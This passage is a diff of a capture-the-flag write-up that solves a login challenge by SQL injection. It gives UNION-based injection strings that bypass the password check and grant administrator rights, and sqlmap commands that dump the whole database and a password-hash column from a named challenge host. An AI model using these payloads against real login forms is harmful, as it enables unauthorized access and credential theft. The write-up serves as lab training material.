chmieladr/capture-the-flag-solutions/EE_CTF_2024/failed_session/solution.md

 username=' UNION ALL SELECT NULL,"",NULL,NULL#&password=any
 ```

-> Password doesn't matter as thanks to the injection - it isn't even checked.
+> The Password doesn't matter as thanks to the injection - it isn't even checked.

 However, we aren't done yet.
-We have only accessed the database and we don't have the administrator permissions that are essential to obtain the flag.
+We have only accessed the database,
+and we don't have the administrator permissions that are essential to get the flag.
 We can achieve that by modifying the last argument.

 ```
 username=' UNION ALL SELECT NULL,"",NULL,1#&password=any
 ```

-This simple modification let me access another stage.
+This modification lets me access another stage.
 However, now we need to provide the actual password.

 ### 3. Use the injection along with the SQLMap tool to dump everything
 ```sh
 python3 sqlmap.py -u "http://container-manager.francecentral.cloudapp.azure.com:10144/login.php" --data="username=' UNION ALL SELECT NULL,"",NULL,1#&password=PxEl" --dump-all
 ```
-After dumping everything and analysing the output, I found out that the database is called `db1` and has a table named `users`.
+After dumping everything and analyzing the output,
+I found out that the database is called `db1` and has a table named `users`.

-While trying to SQL inject manually (without the usage of SQLMap), I found out that one of the columns in that table is called `passwordMD5`.
+While trying to SQL to inject manually (without the usage of SQLMap),
+I found out that one of the columns in that table is called `passwordMD5`.
 It has been proven to exist by the MariaDB error.
 The name clearly indicates that it likely contains the MD5 hashes of passwords.
 Let's dump that column.

 ```sh
 python3 sqlmap.py -u "http://container-manager.francecentral.cloudapp.azure.com:10144/confirm.php" --batch --forms --crawl=2 -D db1 -T users -C passwordMD5 --dump